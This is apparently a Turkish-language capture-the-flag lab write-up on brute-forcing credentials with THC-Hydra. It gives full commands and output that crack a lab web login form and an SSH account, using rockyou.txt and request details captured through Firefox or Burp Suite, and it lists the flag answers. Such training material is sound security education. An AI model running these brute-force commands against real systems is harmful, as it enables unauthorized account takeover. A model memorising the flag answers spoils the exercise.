# Brute Force with THC-Hydra

**Flags**:

- Dwayne Medrano'nun şifresi nedir?
    - anwser: **camila**
- THC-Hydra'yı kullanarak, dwayne_medrano kullanıcı adıyla SSH bağlantı noktasını kaba kuvvetle çalıştırın ve 10.0.0.76'da çalışan sunucunun SSH bağlantı noktasının şifresini kırın. 
    - anwser: **mahalkita**

## Açıklama

**0 - THC-Hydra'ya Giriş**
- THC-Hydra, saldırı için çok sayıda protokolü destekleyen paralelleştirilmiş bir şifre kırıcıdır. Çok hızlı ve esnektir ve yeni modüllerin eklenmesi kolaydır. Bu araç, araştırmacıların ve güvenlik danışmanlarının bir sisteme uzaktan yetkisiz erişim elde etmenin ne kadar kolay olacağını göstermelerini mümkün kılar.
- THC-Hydra'yı çatlak Web Form Şifreleri, SSH Şifreleri, FTP Şifreleri, RDP şifreleri ve daha fazlası için kullanabilirsiniz!
- THC-Hydra resmi olarak şunları destekler: Cisco AAA, Cisco auth, Cisco etkinleştirme, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET, HTTP(S)- HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB(NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 ve v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC ve XMPP.
- Basit Syntax `$ hydra -L <kullanıcı adı listesi> -p <parola listesi> <IP Adresi>`
- THC-Hydra kullanım kılavuzu sayfası ile THC-Hydra kullanımı hakkında daha fazla bilgi edinebilirsiniz. THC-Hydra kılavuz sayfasını şu şekilde açabilirsiniz: `$ man hydra`


**1 - Web Passwordlarını THC-HYDRA ile Kırın!**
- Nmap ile ağdaki tüm bilgisayarları buluyoruz. Öncelikle port 80'den yayın yapan web sayfasını açalım. Giriş sayfası bizi karşılıyor. Giriş yapmak için e-posta ve şifre gerekiyor. Dwayne Medrano pentest hizmeti için bizimle iletişime geçti.
 - Şu anki iş e-postasının dwayne_medrano@trainingmail.com olduğunu biliyorsunuz. THC-Hydra ve rockyou.txt kullanarak http://10.0.0.7 web sitesi şifresini kırın!
  - Web formları için temel hidra sözdizimi: `$ hydra -L <kullanıcı adı listesi> -p <parola listesi> <IP Adresi> <protokol> <form parametreleri>:<başarısız oturum açma mesajı>`
  - Öncelikle şimdi parametreler ve başarısız oturum açma mesajı oluşturmamız gerekiyor, bunu yapmak için Firefox'un ağ aracını veya Burp Suite'i kullanabilirsiniz.

  1 - Firefox ile önce `CTRL+SHIFT+E` ile ağ aracını açın, kullanıcı e-postasını ve herhangi bir rastgele şifreyi giriş panelinde girin. Bundan sonra Firefox paketleri yakalar. POST paketine gidin. İste'ye tıklayın ve Yükü İste'yi kopyalayın ve ayrıca Kötü Paroladan Hata Mesajını kopyalayın. Bundan sonra, ihtiyacınız olan form parametrelerine ve başarısız oturum açma mesajına sahip olacaksınız.

![firefox](images/firefox.PNG)

2 - Burp Suite ile önce Burp suite ve Firefox'u açın. Firefox'ta FoxyProxy eklentisine tıklayın ve Proxy olarak Burp Suite'i seçin, Burp Suite'te Proxy Sekmesine gidin ve Intercept'in açık olduğundan emin olun. Kullanıcı e-postasını ve herhangi bir rastgele şifreyi oturum açma paneline girin. Bundan sonra Burp Suite paketleri yakalar. Forward Get paketleri POST paketine kadar. POST paketinde form parametrelerini ve giriş panelinde ihtiyacınız olan başarısız giriş mesajını bulabilirsiniz.

![firefox](images/Burp.PNG)

```bash
attacker@cyberpath:~$ hydra -l dwayne_medrano%40trainingmail.com -P rockyou.txt 10.0.0.7 http-post-form "/login.php:email=dwayne_medrano%40trainingmail
.com&pass=^PASS^&btn-login=:Bad password" 
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-09-30 14:12:48
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking http-post-form://10.0.7.7:80/login.php:email=dwayne_medrano%40trainingmail.com&pass=^PASS^&btn-login=:Bad password
[80][http-post-form] host: 10.0.7.7   login: dwayne_medrano%40trainingmail.com   password: camila
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-09-30 14:12:57
```

**2 - THC-Hydra ile SSH Parolasını Kırın!**
- İçeri girdik. index.php'de görev listesi var. Nmap taramasından ssh sunucusunu zaten biliyoruz. Bugünkü görevden ssh sunucusunun kullanıcı adını öğreniyoruz. SSH serverına kaba kuvvet kullanma zamanı!

```bash
attacker@cyberpath:~$ hydra -l dwayne_medrano -P rockyou.txt 10.0.0.76 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-09-30 14:17:28
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking ssh://10.0.0.76/
[STATUS] 150.00 tries/min, 150 tries in 00:01h, 14344254 to do in 1593:49h, 16 active
[22][ssh] host: 10.0.0.76   login: dwayne_medrano   password: mahalkita
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 8 final worker threads did not complete until end.
[ERROR] 8 targets did not resolve or could not be connected
[ERROR] 0 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-09-30 14:19:14
```


**Yapılacaklar:**
- OpenSSH 7.7 ve VSFTPD 2.3.4 çalıştıran savunmasız sunucular için Metasploit laboratuvarında Metasploit saldırı yöntemlerini öğreneceğiz ve sunucuları ele geçirmeye çalışacağız.